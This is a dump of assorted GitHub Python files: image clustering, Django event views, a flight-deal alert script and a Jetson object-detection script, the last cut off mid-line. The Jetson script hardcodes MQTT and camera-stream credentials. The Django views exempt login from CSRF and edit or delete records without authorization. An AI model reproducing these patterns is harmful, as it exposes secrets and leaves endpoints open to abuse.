+{"seq_id":"2549869304","text":"#!/usr/bin/env python3\r\n\"\"\"\r\nThis script contains the class for studying oscillating clusters on videos in 2D\r\n\"\"\"\r\n\r\nfrom cv2 import (\r\n connectedComponents, connectedComponentsWithStats, MORPH_CROSS,\r\n getStructuringElement, CV_16U, erode, dilate, morphologyEx, MORPH_OPEN,\r\n MORPH_CLOSE, MORPH_GRADIENT, BORDER_CONSTANT, resize, imshow, waitKey,\r\n FONT_HERSHEY_SIMPLEX, putText)\r\nfrom numpy import (\r\n append, float32, sum, mean, zeros, empty, array, nonzero, unique,\r\n isin, logical_or, logical_not, greater, uint8,\r\n uint32, min, any)\r\nfrom cellects.image_analysis.morphological_operations import get_minimal_distance_between_2_shapes\r\n\r\n\r\nclass ClusterFluxStudy:\r\n def __init__(self, dims):\r\n self.dims = dims\r\n\r\n self.pixels_data = empty((4, 0), dtype=uint32)\r\n self.clusters_id = zeros(self.dims[1:], dtype=uint32)\r\n # self.alive_clusters_in_flux = empty(0, dtype=uint32)#list()\r\n self.cluster_total_number = 0\r\n self.cross_33 = getStructuringElement(MORPH_CROSS, (3, 3))\r\n\r\n def update_flux(self, t, contours, current_flux, period_tracking, clusters_final_data):\r\n # flux_dir_changed = logical_xor(current_flux, self.clusters_id)\r\n # Save the data from pixels that are not anymore in efflux\r\n lost = greater(self.clusters_id > 0, current_flux > 0)\r\n # lost = logical_not(equal(current_flux > 0, self.clusters_id > 0))\r\n # lost = flux_dir_changed * (self.clusters_id > 0)\r\n # lost_coord = nonzero(lost)\r\n # if any(lost):\r\n # Some pixels of that cluster faded, save their data\r\n lost_data = nonzero(lost)\r\n lost_data = array((period_tracking[lost], # lost_coord[0], lost_coord[1],\r\n self.clusters_id[lost], lost_data[0], lost_data[1]), dtype=uint32)\r\n # Add this to the array containing the data of each cluster that are still alive\r\n self.pixels_data = append(self.pixels_data, lost_data, axis=1)\r\n # Stop considering these pixels in period_tracking because they switched\r\n period_tracking[lost] = 0\r\n current_period_tracking = zeros(self.dims[1:], dtype=bool)\r\n for curr_clust_id in unique(current_flux)[1:]:\r\n # Get all pixels that were in the same flux previously\r\n curr_clust = current_flux == curr_clust_id\r\n already = self.clusters_id * curr_clust\r\n new = greater(curr_clust, self.clusters_id > 0)\r\n # new = flux_dir_changed * (current_flux == curr_clust_id)\r\n\r\n if not any(already):\r\n # It is an entirely new cluster:\r\n cluster_pixels = new\r\n self.cluster_total_number += 1\r\n cluster_name = self.cluster_total_number\r\n # self.alive_clusters_in_flux = append(self.alive_clusters_in_flux, cluster_name)\r\n else:\r\n # Check whether parts of that cluster correspond to several clusters in clusters_id\r\n cluster_names = unique(already)[1:]\r\n # keep only one cluster name to gather clusters that just became connected\r\n cluster_name = min(cluster_names)\r\n # Put the same cluster name for new ones and every pixels that were\r\n # a part of a cluster touching the current cluster\r\n cluster_pixels = logical_or(isin(self.clusters_id, cluster_names), new)\r\n # new = self.clusters_id == cluster_names\r\n # If they are more than one,\r\n if len(cluster_names) > 1:\r\n # Update these cluster names in pixels_data\r\n self.pixels_data[1, isin(self.pixels_data[1, :], cluster_names)] = cluster_name\r\n # self.pixels_data[self.pixels_data[1, :] == cluster_names] = cluster_name\r\n # Update these cluster names in alive_clusters_in_flux: remove names that are not used anymore\r\n # 
self.alive_clusters_in_flux = delete(self.alive_clusters_in_flux, isin(self.alive_clusters_in_flux, cluster_names[cluster_names != cluster_name]))\r\n # cluster_names_to_remove = cluster_names.copy()\r\n # cluster_names_to_remove = delete(cluster_names_to_remove,\r\n # nonzero(cluster_names_to_remove == cluster_name))\r\n # # Remove the deleted clusters from the alive cluster list\r\n # [self.alive_clusters_in_flux.remove(i) for i in cluster_names_to_remove if i in self.alive_clusters_in_flux]\r\n # Update clusters_id\r\n self.clusters_id[cluster_pixels] = cluster_name\r\n # Update period_tracking\r\n current_period_tracking[curr_clust] = True\r\n\r\n period_tracking[current_period_tracking] += 1\r\n # Remove lost pixels from clusters_id\r\n self.clusters_id[lost] = 0\r\n # self.alive_clusters_in_flux = self.alive_clusters_in_flux[isin(self.alive_clusters_in_flux, unique(self.clusters_id))]\r\n\r\n # Find out which clusters are still alive or not\r\n # still_alive_clusters = isin(self.pixels_data[1, :], self.alive_clusters_in_flux)\r\n still_alive_clusters = isin(self.pixels_data[1, :], unique(self.clusters_id))\r\n clusters_to_archive = unique(self.pixels_data[1, logical_not(still_alive_clusters)])\r\n # store their data in clusters_final_data\r\n for cluster in clusters_to_archive:\r\n cluster_bool = self.pixels_data[1, :] == cluster\r\n cluster_size = sum(cluster_bool)\r\n cluster_img = zeros(self.dims[1:], dtype=uint8)\r\n cluster_img[self.pixels_data[2, cluster_bool], self.pixels_data[3, cluster_bool]] = 1\r\n if any(dilate(cluster_img, kernel=self.cross_33, borderType=BORDER_CONSTANT, borderValue=0) * contours):\r\n minimal_distance = 1\r\n else:\r\n if cluster_size > 200:\r\n cluster_img = nonzero(morphologyEx(cluster_img, MORPH_GRADIENT, self.cross_33))\r\n contours[cluster_img] = 2\r\n else:\r\n contours[self.pixels_data[2, cluster_bool], self.pixels_data[3, cluster_bool]] = 2\r\n # Get the minimal distance between the border of the cell(s) (noted 1 in contours)\r\n # and the border of the cluster in the cell(s) (now noted 2 in contours)\r\n minimal_distance = get_minimal_distance_between_2_shapes(contours)\r\n data_to_save = array([[mean(self.pixels_data[0, cluster_bool]), t,\r\n cluster_size, minimal_distance]], dtype=float32)\r\n clusters_final_data = append(clusters_final_data, data_to_save,\r\n axis=0) # [\"mean_pixel_period\", \"total_size\", \"death_time\"]\r\n # and remove their data from pixels_data\r\n self.pixels_data = self.pixels_data[:, still_alive_clusters]\r\n\r\n return period_tracking, clusters_final_data\r\n\r\n\r\n","repo_name":"Aurele-B/Cellects","sub_path":"src/cellects/image_analysis/cluster_flux_study.py","file_name":"cluster_flux_study.py","file_ext":"py","file_size_in_byte":7030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"74634275454","text":"\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework import status, serializers\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.models import User\n\nfrom .models import Event, Category, Tipology\nfrom django.http import JsonResponse\nfrom event.serializers import CategorySerializer, EventSerializer, TipologySerializer\n\nimport json\n\n# Create your views here.\n\n@csrf_exempt\ndef add_user_view(request):\n message = \"\"\n if request.method == 'POST':\n jsonUser = json.loads(request.body.decode('utf-8'))\n password = jsonUser['password']\n email = jsonUser['email']\n\n user_model = User.objects.create_user(username=email, password=password)\n user_model.email = email\n user_model.save()\n message = 'Usuario Registrado'\n\n return JsonResponse({'message':message}, status=status.HTTP_200_OK)\n\n@csrf_exempt\ndef login_user_view(request):\n message = \"\"\n status_code = status.HTTP_200_OK\n if request.method == 'POST':\n jsonUser = json.loads(request.body.decode('utf-8'))\n username = jsonUser['email']\n password = jsonUser['password']\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n message = 'usuario logeado: ' + str(user.pk)\n return JsonResponse({'message': message, 'id':user.pk}, status=status_code)\n else:\n message = 'Usuario o contrasenia incorrectos.'\n status_code = status.HTTP_401_UNAUTHORIZED\n return JsonResponse({'message': message}, status=status_code)\n\n \n\n\n@csrf_exempt\ndef all_events_view(request):\n if request.method == 'GET':\n user = request.GET.get('userId')\n event_list = Event.objects.filter(creation_user=user).order_by('-creation_date')\n serializer = EventSerializer(event_list, many=True)\n return JsonResponse(serializer.data, safe=False)\n\n\n@csrf_exempt\ndef add_event_view(request):\n if request.method == 'POST':\n jsonEvent = json.loads(request.body.decode('utf-8'))\n name = jsonEvent['name']\n detail = jsonEvent['detail']\n place = jsonEvent['place']\n address = jsonEvent['address']\n start_date = jsonEvent['start_date']\n end_date = jsonEvent['end_date']\n category_type = jsonEvent['category_type']\n event_type = jsonEvent['event_type']\n creation_user = jsonEvent['creation_user']\n\n category_model = Category.objects.get(pk=category_type)\n tipology_model = Tipology.objects.get(pk=event_type)\n user_model = User.objects.get(pk=creation_user)\n\n event_model = Event()\n event_model.name = name\n event_model.detail = detail\n event_model.place = place\n event_model.address = address\n event_model.start_date = start_date\n event_model.end_date = end_date\n event_model.category_type = category_model\n event_model.event_type = tipology_model\n event_model.creation_user = user_model\n event_model.save()\n message = 'Evento Registrado'\n\n return JsonResponse({'message': message})\n\n\n@csrf_exempt\ndef edit_event_view(request):\n message = \"\"\n if request.method == 'POST':\n jsonEvent = json.loads(request.body.decode('utf-8'))\n id= jsonEvent['id']\n name = jsonEvent['name']\n detail = jsonEvent['detail']\n place = jsonEvent['place']\n address = jsonEvent['address']\n start_date = jsonEvent['start_date']\n end_date = jsonEvent['end_date']\n category_type = jsonEvent['category_type']\n event_type = jsonEvent['event_type']\n creation_user = jsonEvent['creation_user']\n\n category_model = Category.objects.get(pk=category_type)\n tipology_model = Tipology.objects.get(pk=event_type)\n user_model = 
User.objects.get(pk=creation_user)\n\n event_model = Event.objects.get(pk=id)\n event_model.name = name\n event_model.detail = detail\n event_model.place = place\n event_model.address = address\n event_model.start_date = start_date\n event_model.end_date = end_date\n event_model.category_type = category_model\n event_model.event_type = tipology_model\n event_model.creation_user = user_model\n event_model.save()\n message = 'Event ' + str(event_model.pk) + ' updated'\n\n return JsonResponse({'message': message})\n\n\n@csrf_exempt\ndef delete_event_view(request):\n message = \"\"\n if request.method == 'POST':\n jsonEvent = json.loads(request.body.decode('utf-8'))\n id = jsonEvent['id']\n event_model = Event.objects.get(pk=id).delete()\n message = 'Event ' + str(id) + ' deleted'\n\n return JsonResponse({'message': message})\n\n\n@csrf_exempt\ndef category_event_view(request):\n if request.method == 'GET':\n category_model = Category.objects.all()\n serializer = CategorySerializer(category_model, many=True)\n\n return JsonResponse(serializer.data, safe=False)\n\n\n@csrf_exempt\ndef tipology_event_view(request):\n if request.method == 'GET':\n typology_model = Tipology.objects.all()\n serializer = TipologySerializer(typology_model, many=True)\n\n return JsonResponse(serializer.data, safe=False)\n\n\n","repo_name":"emantilla/bdb-test-backend","sub_path":"event/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"73815683136","text":"from llama_index import SimpleDirectoryReader, GPTListIndex, readers, GPTSimpleVectorIndex, LLMPredictor, PromptHelper, ServiceContext\nfrom langchain import OpenAI\nimport os\n\nos.environ[\"OPENAI_API_KEY\"] = 'YOUR_API_KEY_HERE'\n\ndef construct_index(directory_path):\n # set maximum input size\n max_input_size = 4096\n # set number of output tokens\n num_outputs = 2000\n # set maximum chunk overlap\n max_chunk_overlap = 20\n # set chunk size limit\n chunk_size_limit = 600 \n\n # define prompt helper\n prompt_helper = PromptHelper(max_input_size, num_outputs, max_chunk_overlap, chunk_size_limit=chunk_size_limit)\n\n # define LLM\n llm_predictor = LLMPredictor(llm=OpenAI(temperature=0.5, model_name=\"text-davinci-003\", max_tokens=num_outputs))\n \n documents = SimpleDirectoryReader(directory_path).load_data()\n \n service_context = ServiceContext.from_defaults(llm_predictor=llm_predictor, prompt_helper=prompt_helper)\n index = GPTSimpleVectorIndex.from_documents(documents, service_context=service_context)\n\n return index\n\n# Save the index to disk outside of construct_index\nif not os.path.isfile('index.json'):\n index = construct_index('context_data/iotium')\n index.save_to_disk('index.json')\n\ndef ask_ai():\n index = GPTSimpleVectorIndex.load_from_disk('index.json')\n while True: \n query = input(\"What do you want to ask? \")\n response = index.query(query)\n print(f\"Response: {response.response}\")\n\nask_ai()\n","repo_name":"Gokuljokul/CustomGPT","sub_path":"trainDataset.py","file_name":"trainDataset.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"15486816267","text":"from datetime import datetime, timedelta\nfrom data_manager import DataManager\nfrom flight_search import FlightSearch\nfrom notification_manager import NotificationManager\n\ndata_manager = DataManager()\nsheet_data = data_manager.get_destination_data()\nflight_search = FlightSearch()\nnotification_manager = NotificationManager()\n\nif sheet_data[0][\"iataCode\"] == \"\":\n for row in sheet_data:\n row[\"iataCode\"] = flight_search.get_destination_code(row[\"city\"])\n data_manager.destination_data = sheet_data\n data_manager.update_destination_codes()\n\ntomorrow = datetime.now() + timedelta(days=1)\nsix_month_from_today = datetime.now() + timedelta(days=(6 * 30))\n\nfor destination in sheet_data:\n flight = flight_search.check_flights(\n destination[\"home\"],\n destination[\"iataCode\"],\n from_time=tomorrow,\n to_time=six_month_from_today,\n nights_in_dst_from=destination[\"minNrOfDays\"],\n nights_in_dst_to=destination[\"maxNrOfDays\"],\n nrOfPersons=destination[\"nrOfPersons\"]\n )\n if flight is None:\n continue\n if flight.price < destination[\"lowestPricePerPerson\"]:\n msg = f\"Low price alert! Only {flight.price} EUR per person to fly from {flight.origin_city}-{flight.origin_airport}\\\n to {flight.destination_city}-{flight.destination_airport} and back, from {flight.out_date} to {flight.return_date}.\"\n if flight.via_city:\n msg += f\"\\nThe flight has a stop-over via {flight.via_city}.\"\n for route in flight.route:\n airline = route[\"airline\"]\n city_code_from = route[\"cityCodeFrom\"]\n city_code_to = route[\"cityCodeTo\"]\n flight_no = route[\"flight_no\"]\n departure = route[\"local_departure\"][:16].replace('T', '_')\n arrival = route[\"local_arrival\"][:16].replace('T', '_')\n msg += f\"\\n {city_code_from}-{city_code_to} {airline}{flight_no} {departure} {arrival}\"\n msg += f\"\\nbooking link: https://www.google.co.uk/flights?hl=en#flt={destination['home']}.{destination['iataCode']}.{flight.out_date}*{destination['iataCode']}.{destination['home']}.{flight.return_date}\"\n\n notification_manager.send_msg(message=msg, lst_emails=destination[\"email\"])","repo_name":"MarcBruyland/flight-deal","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"185811219","text":"import streamlit as st\r\nimport zipfile\r\nfrom Bio import SeqIO\r\nfrom io import StringIO\r\nfrom io import BytesIO\r\nimport random\r\n\r\ndef preprocessing():\r\n st.markdown(\r\n \"\"\"\r\n \r\n \"\"\",\r\n unsafe_allow_html=True,\r\n )\r\n\r\n with open(\"quotes.txt\", \"r\", encoding=\"utf-8\") as f:\r\n file_text = f.read()\r\n quotes = file_text.split(\"\\n\\n\")\r\n\r\n st.title(\"Welcome to the Preprocessing Page!\")\r\n st.subheader(\"Upload your FASTA file\")\r\n uploaded_file = st.file_uploader(\"Upload\", type=[\"fasta\",\"fa\"])\r\n #user_length = st.text_input(\"Enter the legth of the Sequence: \")\r\n col1, col2 = st.columns([1,10])\r\n with col1:\r\n show_submit = st.button(\"Submit\")\r\n with col2:\r\n show_example = st.button(\"Load Example\")\r\n\r\n def load_example_file():\r\n with open(\"example.fasta\",\"rb\") as f:\r\n return BytesIO(f.read())\r\n\r\n def preprocess_sequences(records):\r\n #remove sequences with \"X\"\r\n print(\"Removing the duplicate sequences...\")\r\n records = [r for r in records if \"X\" not in r.seq]\r\n\r\n #remove duplicate sequences\r\n sequences = []\r\n unique_records = []\r\n for record in records:\r\n sequence = str(record.seq)\r\n if sequence not in sequences:\r\n unique_records.append(record)\r\n sequences.append(sequence)\r\n st.write(\"Total number of sequences after removing duplicate sequences is:: \", len(unique_records))\r\n return unique_records\r\n \r\n def filter_sequences(sequences):#, target_length):\r\n print(\"Removing unequal length sequences...\")\r\n filtered_sequences = []\r\n for record in sequences:\r\n #if(len(record.seq) == target_length):\r\n filtered_sequences.append(record)\r\n st.write(\"Total number of sequences after making sequences of equal length is:: \", len(filtered_sequences))\r\n return filtered_sequences\r\n\r\n # Initialize the current index\r\n if \"current_index\" not in st.session_state:\r\n st.session_state.current_index = 0\r\n\r\n st.write(\"\"\"***\"\"\")\r\n\r\n if show_submit:\r\n with st.spinner(\"SAMOSA is cleaning your dataset. Please wait....\"):\r\n with zipfile.ZipFile(\"preprocessed_data.zip\", \"w\") as output_zip:\r\n if(uploaded_file is not None):\r\n stringio = StringIO(uploaded_file.getvalue().decode(\"utf-8\"))\r\n records = list(SeqIO.parse(stringio, \"fasta\"))\r\n st.write(\"Total number of sequences before preprocessing is:: \",len(records))\r\n\r\n #preprocess the sequences\r\n processed_records = preprocess_sequences(records)\r\n sequence_filtered = filter_sequences(processed_records)#,int(user_length))\r\n\r\n #download the preprocessed file\r\n if(len(sequence_filtered)>0):\r\n with StringIO() as output:\r\n SeqIO.write(sequence_filtered, output, \"fasta\")\r\n processed_file = output.getvalue().encode()\r\n\r\n st.download_button(label=\"Download Preprocessed File\", data=processed_file, file_name=\"preprocessed.fasta\", mime=\"application/octet-stream\")\r\n quote = random.choice(quotes)\r\n st.write(quote)\r\n\r\n elif show_example:\r\n with st.spinner(\"SAMOSA is cleaning the example dataset. 
Please Wait.....\"):\r\n with zipfile.ZipFile(\"example_preprocessed_data.zip\", \"w\") as output_zip:\r\n if(uploaded_file is None):\r\n file_contents = load_example_file()\r\n stringio = StringIO(file_contents.getvalue().decode(\"utf-8\"))\r\n records = list(SeqIO.parse(stringio, \"fasta\"))\r\n st.write(\"Total number of sequences before preprocessing is:: \",len(records))\r\n\r\n processed_records = preprocess_sequences(records)\r\n\r\n if(len(processed_records)>0):\r\n with StringIO() as output:\r\n SeqIO.write(processed_records, output, \"fasta\")\r\n processed_file = output.getvalue().encode()\r\n\r\n st.download_button(label=\"Download Preprocessed Example File\", data=processed_file, file_name=\"preprocessed_example_file.fasta\", mime=\"application/octet-stream\")\r\n\r\n st.write(\"\")\r\n st.write(\"\"\"***\"\"\")\r\n quote = random.choice(quotes)\r\n st.write(quote)\r\n st.write(\"\"\"***\"\"\")\r\n\r\n\r\n","repo_name":"psychedelic2007/biohub_webserver","sub_path":"util/pages/Preprocessing.py","file_name":"Preprocessing.py","file_ext":"py","file_size_in_byte":4703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"12724953013","text":"# \n#\n#\n#\n#\n# This is the script for the technical task for the process in Motor AI.\n# Author: Andrés Prada\n\nimport os, glob, cv2, time\nfrom pathlib import Path\nimport numpy as np\nfrom keras.applications.resnet import ResNet152\nfrom sklearn.cluster import AgglomerativeClustering\nfrom sklearn.utils.multiclass import unique_labels\nfrom sklearn import manifold\nfrom sklearn.metrics import confusion_matrix, normalized_mutual_info_score\nimport matplotlib.pyplot as plt\n\n# Importts from other models:\n#\n# from keras import Model\n# from cifar100vgg import cifar100vgg\n# from keras.applications.inception_resnet_v2 import InceptionResNetV2\n# from keras.applications.nasnet import NASNetLarge\n# from keras.applications.vgg16 import VGG16\n# from keras.applications.xception import Xception\n#\n\n\ndef visualize_data(Z, labels, num_clusters):\n\t'''\n\t\tThis function helps to visualize the data performing a dimensionality reduction with TSNE.\n\t'''\n\ttsne = manifold.TSNE(n_components=2, init='pca', random_state=0).fit_transform(Z)\n\tfig = plt.figure()\n\tplt.scatter(tsne[:, 0], tsne[:, 1], s=2, c=labels, cmap=plt.cm.get_cmap(\"jet\", num_clusters))\n\tplt.colorbar(ticks=range(num_clusters))\n\tplt.show()\n\ndef plot_matrix(y_true, y_pred, classes, title=None, cmap=plt.cm.Blues):\n\t\"\"\"\n\t This function plots the matrix true label vs cluster label.\n\t It is edited from https://scikit-learn.org/stable/auto_examples/model_selection/plot_confusion_matrix.html\n\t \"\"\"\n\n\t# Compute confusion matrix\n\tcm = confusion_matrix(y_true, y_pred)\n\n\t# Only use the labels that appear in the data\n\tclasses = classes[unique_labels(y_true, y_pred)]\n\n\tfig, ax = plt.subplots()\n\tim = ax.imshow(cm, interpolation='nearest', cmap=cmap)\n\tax.figure.colorbar(im, ax=ax)\n\t# We want to show all ticks...\n\tax.set(xticks=np.arange(cm.shape[1]), yticks=np.arange(cm.shape[0]), xticklabels=classes, yticklabels=classes, title=title, ylabel='True label', xlabel='Cluster label')\n\t \n\t# Rotate the tick labels and set their alignment.\n\tplt.setp(ax.get_xticklabels(), fontsize=6, rotation=45, ha=\"right\", rotation_mode=\"anchor\")\n\tplt.setp(ax.get_yticklabels(), fontsize=6)\n\n\t# Loop over data dimensions and create text annotations.\n\tthresh = cm.max() / 2.\n\tfor i in range(cm.shape[0]):\n\t\tfor j in range(cm.shape[1]):\n\t\t\tif cm[i,j] > 0:\n\t\t\t\tax.text(j, i, cm[i, j], fontsize=6, ha=\"center\", va=\"center\", color=\"white\" if cm[i, j] > thresh else \"black\")\n\tfig.tight_layout()\n\tplt.show()\n\treturn ax\n\nif __name__ == '__main__':\n\n\tstart_time = time.time()\n\t# Open images folder\n\timage_path = \"tsrd-train/\"\n\timage_paths = [str(p)for p in Path(image_path).glob('*.png')]\n\n\t# Extracct labels from image name\n\tlabels = [int(str(p).split(\"/\")[1].split(\"_\")[0][-2:]) for p in image_paths]\n\n\n\t# Commented models. 
For testing, please check the README to adjust image dimensions and feature vector size\n\n\t#model = Xception(include_top=False, weights='imagenet', pooling='avg')\n\t#model = NASNetLarge(include_top=False, weights='imagenet', pooling='avg')\n\t#model = InceptionResNetV2(include_top=False, weights='imagenet', pooling='avg')\n\t#model = VGG16(include_top=False, weights='imagenet', pooling='avg')\n\t#model = cifar100vgg(train=False)\n\t#my_layer = model.model.layers[56]\n\t#model = Model(model.model.input, outputs=my_layer.output)\n\n\t# Define the model\n\tmodel = ResNet152(include_top=False, weights='imagenet', pooling='avg')\n\tn_clusters = 58\n\tmodel.layers[0].trainable = False\n\tdims = [224,224]\n\tvect_len = 2048\n\n\t# Define list to store vector values\n\tfeature_vects = np.zeros((len(image_paths), vect_len), dtype=float)\n\n\t# Extract vectors\n\tfor idx, img in enumerate(image_paths):\n\t\t# Print\n\t\tprint(\"Extracting vector features for image: \"+str(idx))\n\n\t\t# Load and reshape the image to input to the network\n\t\timg = cv2.resize(cv2.imread(img), (dims[0], dims[1]))\n\n\t\t# Add the 4th dim (1, 224, 224, 3)\n\t\timg = np.expand_dims(img.copy(), axis=0)\n\n\t\t# Predict and store value\n\t\tfeature_vects[idx, :] = model.predict(img).flatten()\n\n\t# Cluster the vectors\n\tclusters = AgglomerativeClustering(n_clusters=n_clusters).fit(feature_vects)\n\n\t# Check running time\n\tprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\n\t#Evaluate similarity normalized_mutual_info_score\n\tnmi = normalized_mutual_info_score(labels, clusters.labels_, average_method='warn')\n\tprint('Evaluation of similarity with normalized mutual score: ' + str(nmi))\n\n\t# Print true label vs cluster\n\tplot_matrix(labels, clusters.labels_, np.unique(labels), title='Labeled images')\n\n\t# Finally, visualize data\n\tvisualize_data(feature_vects, labels, n_clusters)\n\n\n\n\n\n\n\n\n\n","repo_name":"AndresPrada/clustering-tsrd","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4569,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"29199607744","text":"import argparse, sys\nctecka = argparse.ArgumentParser()\n\nctecka.add_argument(\"files\", default=(sys.stdin,), nargs=\"*\", type=argparse.FileType())\nctecka.add_argument(\"--min\", \"-m\", default=-1, type=int)\nctecka.add_argument(\"--ignore-case\", \"-i\", action=\"store_true\")\nctecka.add_argument(\"--alphabetical\", \"-a\", action=\"store_true\")\nctecka.add_argument(\"--output\", \"-o\", default=sys.stdout, type=argparse.FileType(\"w\"))\n\nargs = ctecka.parse_args()\n\ndef spocti_slova(soubory, ignore_case):\n frekvence = {}\n for soubor in soubory:\n with soubor:\n obsah_souboru = \"\".join(soubor.readlines()).split()\n for slovo in obsah_souboru:\n if ignore_case:\n slovo = slovo.lower()\n if slovo not in frekvence:\n frekvence[slovo] = 1\n else:\n frekvence[slovo] += 1\n return frekvence\n\nfrekvence_slov = spocti_slova(args.files, args.ignore_case)\nmaximalni_frekvence = len(str(max(frekvence_slov.values())))\n\nif not args.alphabetical:\n poradi_slov = sorted(frekvence_slov.items(), key=lambda x: (-x[1], x[0]))\nelse:\n poradi_slov = sorted(frekvence_slov.items())\n\nwith args.output as soubor:\n for slovo, pocet in poradi_slov:\n if pocet != -1 and pocet >= args.min:\n soubor.writelines(f\"{str(pocet).rjust(maximalni_frekvence)} {slovo}\\n\")\n","repo_name":"MaximPolak/Python","sub_path":"2021-06-24/Frekvencni_distribuce.py","file_name":"Frekvencni_distribuce.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"44776267798","text":"#\n# https://github.com/dusty-nv/jetson-inference/blob/master/docs/detectnet-console-2.md\n#\n# sudo systemctl status track_detect.service\n# sudo systemctl restart track_detect.service\n# sudo systemctl disable track_detect.service\n# sudo systemctl enable track_detect.service\n# sudo systemctl stop track_detect.service\n# sudo systemctl start track_detect.service\n# tail -f /tmp/jetson.log\n#\n# Importing all the necessary modules\nfrom typing import Counter\nimport jetson.inference\nimport jetson.utils\nimport time\nimport cv2\nimport numpy as np \nfrom datetime import datetime\nfrom tracker import *\nfrom support_functions import *\nimport pandas as pd\nimport paho.mqtt.client as mqtt\nimport sys;\nimport logging;\nimport json;\n\ndef on_connect(client, userdata, flags, rc):\n if rc==0:\n client.connected_flag=True #set flag\n logging.debug(\"paho mqtt client connected ok\")\n elif rc==5:\n logging.debug(\"paho mqtt client not connected, authentication failure\")\n client.bad_connection_flag=True\n else:\n logging.debug(\"paho mqtt client not connected, returned code=%d\",rc)\n client.bad_connection_flag=True\n\nlogging.basicConfig(filename='/tmp/jetson.log', level=logging.DEBUG)\n\nclient_name='Jetson'\nclient = mqtt.Client(client_name)\nhost='130.191.161.21' # broker address\nclient.connected_flag=False\nclient.bad_connection_flag=False\nclient.on_connect=on_connect # bind callback function\nclient.username_pw_set(username=\"starlab\",password=\"starlab!\")\nclient.connect(host, port=1883, keepalive=60, bind_address=\"\")\n\nclient.loop_start() #Start loop\n\nwhile not client.connected_flag and client.bad_connection_flag: #wait in loop\n logging.debug(\"In wait loop\")\n time.sleep(1)\n\nlogging.debug('client.bad_connection_flag: %r',client.bad_connection_flag)\nlogging.debug('client.connected_flag: %r\\n\\n',client.connected_flag)\n\nmsg = f\"started\"\ntopic = f\"pelco/jetson\"\nresult = client.publish(topic, msg)\nstatus = result[0]\nif status == 0:\n logging.debug(f\"Send `{msg}` to topic `{topic}`\")\nelse:\n logging.debug(f\"Failed to send message to topic {topic}\")\n sys.exit()\n\ntracker = EuclideanDistTracker()\n\n# For FPS text need time\ntimeStamp=time.time()\nfpsFilt=0\n\n# Model \n#net = jetson.inference.detectNet(argv=[\"--model=/media/jetson/UGUR_USB_C/models/epoch_max/ssd-mobilenet.onnx\", \"--labels=/media/jetson/UGUR_USB_C/models/april_model/labels.txt\", \"--input-blob=input_0\", \"--output-cvg=scores\", \"--output-bbox=boxes\"], threshold=0.5)\nnet = jetson.inference.detectNet(argv=[\"--model=/home/iot/jetson-inference/python/training/detection/ssd/models/last_model/ssd-mobilenet.onnx\", \"--labels=/home/iot/jetson-inference/python/training/detection/ssd/models/last_model/labels.txt\", \"--input-blob=input_0\", \"--output-cvg=scores\", \"--output-bbox=boxes\"], threshold=0.5)\n\n# Picture Size for display\ndispW=1280\ndispH=720\nflip=2\nfont=cv2.FONT_HERSHEY_SIMPLEX # Font for the texts\n\n# Video Settings\n#cap=cv2.VideoCapture('file:///home/jetson/Desktop/Sample_Video/suv_truck.mp4') #can be changed with any other video source or a file\n\n\ncap=cv2.VideoCapture('rtsp://ued:uU8xwmin@sunray.sdsu.edu/stream2')\n\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, dispW)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, dispH)\ncap.set(cv2.CAP_PROP_FPS, int(3))\n\nresult = cv2.VideoWriter('output.mp4', cv2.VideoWriter_fourcc(*'MP4V'),10, (1280,720))\ndetected_objects = []\nwhile True:\n\n ret, img = cap.read()\n\n if ret == False:\n condition = False\n break\n 
\n # Image Info to OpenCV\n height=img.shape[0]\n width=img.shape[1]\n\n # Changing the color to Needed format for detection for Nvidia Jetson\n frame=cv2.cvtColor(img,cv2.COLOR_BGR2RGBA).astype(np.float32)\n # Converting the image from Numpy to CUDA\n frame=jetson.utils.cudaFromNumpy(frame)\n\n # Getting Detections for each Frame\n detections=net.Detect(frame, width, height)\n\n \n detection_list = []\n \n for detect in detections:\n # TODO: Uncomment this for all the info for each detection\n print(detect)\n \n # Get all the information from the detection class\n \n ID=detect.ClassID\n top=detect.Top\n left=detect.Left\n bottom=detect.Bottom\n right=detect.Right\n width_d = detect.Width\n height_d = detect.Height\n item=net.GetClassDesc(ID)\n center = detect.Center\n center_x = int(center[0])\n center_y = int(center[1])\n confidence = detect.Confidence\n \n # Getting the center locations in integer format in a tuple\n center = (center_x,center_y)\n \n # Rendering the image\n # * Boundary Box\n img = cv2.rectangle(img,(int(left),int(top)),(int(right),int(bottom)),(0,255,0),2)\n \n # * Center Circles\n img = cv2.circle(img, center, 1, (255,255,255), 10)\n # * Class ID and Confidence Text\n cv2.putText(img,str(item)+\" \"+str(round(detect.Confidence,2)),(int(left)+75,int(top)-15),font,1,(255,255,0),2)\n\n \n detection_list.append([int(left),int(top),int(width_d),int(height_d),item])\n \n currentTime = datetime.now()\n \n print(item)\n\n with open(\"/home/iot/Desktop/app/Detections.txt\", \"a\") as f:\n f.write(\"The current timestamp is: \" + str(datetime.now()))\n f.write(\"\\n\")\n f.write(\"The detection Details are: \" + str(detect))\n f.write(\"\\n\")\n f.write(\"Detected is: \" + str(item))\n f.write(\"\\n\")\n f.close()\n \n data = {\n \"id\": format(detect.ClassID),\n \"top\": \"{:.2f}\".format(detect.Top),\n \"left\": 